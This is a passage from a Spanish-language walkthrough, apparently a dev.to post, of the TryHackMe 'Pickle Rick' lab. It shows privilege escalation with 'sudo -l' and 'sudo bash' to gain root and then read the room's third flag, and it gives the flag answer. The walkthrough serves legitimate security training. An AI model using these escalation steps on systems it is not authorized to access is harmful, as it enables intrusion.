&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7xzw8xplfy1i5udt2n35.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7xzw8xplfy1i5udt2n35.png" alt="Image respuesta 2" width="800" height="74"&gt;&lt;/a&gt;&lt;/p&gt;




&lt;p&gt;Para el siguiente ingrediente debemos escalar privilegios, ya que el directorio &lt;code&gt;/root&lt;/code&gt; nos manda un aviso de &lt;code&gt;permiso denegado&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhccmtektxlrhirlh7jq6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhccmtektxlrhirlh7jq6.png" alt="Image root denegado" width="507" height="98"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Así que usamos &lt;code&gt;sudo -l&lt;/code&gt; para inspeccionar.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcakkkd9f4uro9n7y9yd3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcakkkd9f4uro9n7y9yd3.png" alt="Image sudo" width="800" height="145"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Y en este caso podemos usar &lt;code&gt;sudo bash&lt;/code&gt; para elevarnos como usuario Root, confirmamos con &lt;code&gt;id&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbo49bt3wo9tslo3lzmcs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbo49bt3wo9tslo3lzmcs.png" alt="Image somos Root" width="686" height="202"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Entramos al directorio &lt;code&gt;/root&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1yqzjs3ghlzpdh4ouv4x.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1yqzjs3ghlzpdh4ouv4x.png" alt="Image entramos /root" width="157" height="199"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Vemos &lt;code&gt;3rd.txt&lt;/code&gt; el cual abrimos con &lt;code&gt;cat 3rd.txt&lt;/code&gt; que nos da el tercer ingrediente &lt;code&gt;fleeb juice&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu1ulpihbl53f5u6wh02h.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fu1ulpihbl53f5u6wh02h.png" alt="Image ingrediente 3" width="371" height="58"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Lo confirmamos en las questions.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24khwav3pti6lpid461n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F24khwav3pti6lpid461n.png" alt="Image Resuelto" width="800" height="66"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Y así completamos la máquina &lt;a href="https://tryhackme.com/room/picklerick" rel="noopener noreferrer"&gt;Pickle Rick&lt;/a&gt; en TryHackMe.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>pentesting</category>
      <category>beginners</category>
      <category>tutorial</category>
    </item>
  </channel>
</rss>
